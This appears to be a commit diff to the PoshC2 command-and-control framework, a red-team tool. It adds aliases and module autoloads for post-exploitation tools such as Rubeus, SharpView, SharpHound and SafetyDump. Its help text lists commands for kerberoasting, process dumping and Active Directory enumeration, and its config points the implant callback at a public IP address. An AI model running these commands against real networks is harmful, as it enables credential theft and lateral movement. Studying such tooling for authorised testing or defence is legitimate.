Add aliases for common sharp commands
parent
56ed8c6ee1
commit
6fc1980a2d
13
Alias.py
13
Alias.py
|
@ -14,6 +14,15 @@ py_alias = [
|
|||
# C# Implant
|
||||
cs_alias = [
|
||||
["s","get-screenshot"],
|
||||
["safetydump", "run-exe SafetyDump.Program SafetyDump"],
|
||||
["seatbelt", "run-exe Seatbelt.Program Seatbelt all"]
|
||||
]
|
||||
|
||||
# Parts of commands to replace if command starts with the key
|
||||
cs_replace = [
|
||||
["safetydump", "run-exe SafetyDump.Program SafetyDump"],
|
||||
["sharpup", "run-exe SharpUp.Program SharpUp"],
|
||||
["seatbelt", "run-exe Seatbelt.Program Seatbelt"],
|
||||
["rubeus", "run-exe Rubeus.Program Rubeus"],
|
||||
["sharpview", "run-exe SharpView.Program SharpView"],
|
||||
["sharphound", "run-exe Sharphound2.Sharphound Sharphound"],
|
||||
["watson", "run-exe Watson.Program Watson"]
|
||||
]
|
||||
|
|
|
@ -132,4 +132,10 @@ def run_autoloads(command, randomuri, user):
|
|||
if "remove-wmievent" in command.lower(): check_module_loaded("Invoke-WMIEvent.ps1", randomuri, user)
|
||||
if "invoke-wmi" in command.lower(): check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
|
||||
if "get-lapspasswords" in command.lower(): check_module_loaded("Get-LAPSPasswords.ps1", randomuri, user)
|
||||
if command.lower().strip().startswith("seatbelt"): check_module_loaded("Seatbelt.exe", randomuri, user)
|
||||
if command.lower().strip().startswith("run-exe seatbelt"): check_module_loaded("Seatbelt.exe", randomuri, user)
|
||||
if command.lower().strip().startswith("run-exe sharpup"): check_module_loaded("SharpUp.exe", randomuri, user)
|
||||
if command.lower().strip().startswith("run-exe safetydump"): check_module_loaded("SafetyDump.exe", randomuri, user)
|
||||
if command.lower().strip().startswith("run-exe rubeus"): check_module_loaded("Rubeus.exe", randomuri, user)
|
||||
if command.lower().strip().startswith("run-exe sharpview"): check_module_loaded("SharpView.exe", randomuri, user)
|
||||
if command.lower().strip().startswith("run-exe watson"): check_module_loaded("Watson.exe", randomuri, user)
|
||||
if command.lower().strip().startswith("run-exe sharphound"): check_module_loaded("SharpHound.exe", randomuri, user)
|
||||
|
|
|
@ -7,7 +7,7 @@ PORT_NUMBER = 443 # This is the bind port
|
|||
|
||||
POSHDIR = "/opt/PoshC2_Python/"
|
||||
ROOTDIR = "/opt/PoshC2_Project/"
|
||||
HostnameIP = "https://192.168.233.1"
|
||||
HostnameIP = "https://193.36.15.234"
|
||||
DomainFrontHeader = "" # example df.azureedge.net
|
||||
DefaultSleep = "5s"
|
||||
Jitter = 0.20
|
||||
|
|
61
Help.py
61
Help.py
|
@ -69,7 +69,6 @@ help
|
|||
searchhelp listmodules
|
||||
label-implant <newlabel>
|
||||
back
|
||||
safetydump
|
||||
|
||||
Migration
|
||||
===========
|
||||
|
@ -87,49 +86,38 @@ stop-keystrokes
|
|||
testadcredential domain username password
|
||||
testlocalcredential username password
|
||||
cred-popper
|
||||
loadmodule SharpUp.exe
|
||||
run-exe SharpUp.Program SharpUp
|
||||
sharpup
|
||||
seatbelt all
|
||||
seatbelt BasicOSInfo
|
||||
seatbelt SysmonConfig
|
||||
seatbelt PowerShellSettings
|
||||
seatbelt RegistryAutoRuns
|
||||
watson
|
||||
|
||||
Privilege Escalation:
|
||||
=======================
|
||||
seatbelt
|
||||
loadmodule Seatbelt.exe
|
||||
run-exe Seatbelt.Program Seatbelt all
|
||||
run-exe Seatbelt.Program Seatbelt BasicOSInfo
|
||||
run-exe Seatbelt.Program Seatbelt SysmonConfig
|
||||
run-exe Seatbelt.Program Seatbelt PowerShellSettings
|
||||
run-exe Seatbelt.Program Seatbelt RegistryAutoRuns
|
||||
|
||||
Credentials / Tokens / Local Hashes (Must be SYSTEM):
|
||||
=========================================================
|
||||
Process Dumping:
|
||||
================
|
||||
safetydump
|
||||
safetydump <pid>
|
||||
|
||||
Network Tasks / Lateral Movement:
|
||||
====================================
|
||||
loadmodule Rubeus.exe
|
||||
run-exe Rubeus.Program Rubeus kerberoast
|
||||
run-exe Rubeus.Program Rubeus asreproast /user:username
|
||||
|
||||
Network Tasks / Lateral Movement:
|
||||
====================================
|
||||
loadmodule SharpView.exe
|
||||
run-exe SharpView.Program SharpView Get-NetUser -SamAccountName ben
|
||||
run-exe SharpView.Program SharpView Get-NetGroup -Name *admin* -Domain -Properties samaccountname,member -Recurse
|
||||
run-exe SharpView.Program SharpView Get-NetGroupMember -LDAPFilter GroupName=*Admins* -Recurse -Properties samaccountname
|
||||
run-exe SharpView.Program SharpView Get-NetUser -Name deb -Domain blorebank.local
|
||||
run-exe SharpView.Program SharpView Get-NetSession -Domain blorebank.local
|
||||
run-exe SharpView.Program SharpView Get-DomainController -Domain blorebank.local
|
||||
run-exe SharpView.Program SharpView Get-DomainUser -LDAPFilter samaccountname=ben -Properties samaccountname,mail
|
||||
run-exe SharpView.Program SharpView Get-DomainUser -AdminCount -Properties samaccountname
|
||||
run-exe SharpView.Program SharpView Get-DomainComputer -LDAPFilter operatingsystem=*2012* -Properties samaccountname
|
||||
run-exe SharpView.Program Sharpview Find-InterestingFile -Path c:\\users\\ -Include *exe*
|
||||
run-exe SharpView.Program SharpView Find-InterestingDomainShareFile -ComputerName SERVER01
|
||||
rubeus kerberoast
|
||||
rubeus asreproast /user:username
|
||||
sharpview Get-NetUser -SamAccountName ben
|
||||
sharpview Get-NetGroup -Name *admin* -Domain -Properties samaccountname,member -Recurse
|
||||
sharpview Get-NetGroupMember -LDAPFilter GroupName=*Admins* -Recurse -Properties samaccountname
|
||||
sharpview Get-NetUser -Name deb -Domain blorebank.local
|
||||
sharpview Get-NetSession -Domain blorebank.local
|
||||
sharpview Get-DomainController -Domain blorebank.local
|
||||
sharpview Get-DomainUser -LDAPFilter samaccountname=ben -Properties samaccountname,mail
|
||||
sharpview Get-DomainUser -AdminCount -Properties samaccountname
|
||||
sharpview Get-DomainComputer -LDAPFilter operatingsystem=*2012* -Properties samaccountname
|
||||
sharpview Find-InterestingFile -Path c:\\users\\ -Include *exe*
|
||||
sharpview Find-InterestingDomainShareFile -ComputerName SERVER01
|
||||
|
||||
Bloodhound:
|
||||
=============
|
||||
loadmodule SharpHound.exe
|
||||
run-exe Sharphound2.Sharphound Sharphound --ZipFileName c:\\temp\\test.zip --JsonFolder c:\\temp\\
|
||||
sharphound --ZipFileName c:\\temp\\test.zip --JsonFolder c:\\temp\\
|
||||
"""
|
||||
|
||||
posh_help1 = """
|
||||
|
@ -462,4 +450,5 @@ SHARPCOMMANDS = ["get-userinfo","stop-keystrokes","get-keystrokes","delete","mov
|
|||
"download-file","get-content","ls-recurse","turtle","cred-popper","resolveip","resolvednsname","testadcredential",
|
||||
"testlocalcredential","get-screenshot","modulesloaded","get-serviceperms","unhide-implant","arpscan","ls","pwd","dir",
|
||||
"inject-shellcode","start-process","run-exe","run-dll","hide-implant","help","searchhelp","listmodules","loadmodule",
|
||||
"loadmoduleforce","back","ps","beacon","setbeacon","kill-implant","get-screenshotmulti", "safetydump", "seatbelt"]
|
||||
"loadmoduleforce","back","ps","beacon","setbeacon","kill-implant","get-screenshotmulti", "safetydump", "seatbelt", "sharpup",
|
||||
"sharphound", "rubeus", "sharpview", "watson"]
|
||||
|
|
|
@ -25,8 +25,8 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
|
|||
|
||||
# alias mapping
|
||||
for alias in ps_alias:
|
||||
if alias[0] == command.lower()[:len(command.rstrip())]:
|
||||
command = alias[1]
|
||||
if command.lower().strip().startswith(alias[0]):
|
||||
command.replace(alias[0], alias[1])
|
||||
|
||||
# opsec failures
|
||||
for opsec in ps_opsec:
|
||||
|
|
|
@ -1,9 +1,9 @@
|
|||
import base64, re, traceback, os
|
||||
from Alias import cs_alias
|
||||
from Alias import cs_alias, cs_replace
|
||||
from Colours import Colours
|
||||
from Utils import randomuri, validate_sleep_time
|
||||
from DB import new_task, update_sleep, update_label, unhide_implant, kill_implant, get_implantdetails, get_pid
|
||||
from AutoLoads import check_module_loaded
|
||||
from AutoLoads import check_module_loaded, run_autoloads
|
||||
from Help import sharp_help1
|
||||
from Config import ModulesDirectory, POSHDIR
|
||||
from Core import readfile_with_completion
|
||||
|
@ -20,6 +20,13 @@ def handle_sharp_command(command, user, randomuri, startup):
|
|||
if alias[0] == command.lower()[:len(command.rstrip())]:
|
||||
command = alias[1]
|
||||
|
||||
# alias replace
|
||||
for alias in cs_replace:
|
||||
if command.lower().strip().startswith(alias[0]):
|
||||
command = command.replace(alias[0], alias[1])
|
||||
|
||||
run_autoloads(command, randomuri, user)
|
||||
|
||||
if "searchhelp" in command.lower():
|
||||
searchterm = (command.lower()).replace("searchhelp ","")
|
||||
import string
|
||||
|
|
|
@ -16,6 +16,8 @@ Add NotificationsProjectName in Config.py which is displayed in notifications me
|
|||
Add fpc script which searches the Posh DB for a particular command
|
||||
Use pyreadline for Windows compatibility
|
||||
Modify InjectShellcode logged command to remove base64 encoded shellcode and instead just log loaded filename
|
||||
Add Windows install script
|
||||
Add aliases for common sharp modules
|
||||
|
||||
4.8 (13/02/19)
|
||||
==============
|
||||
|
|
Loading…
Reference in New Issue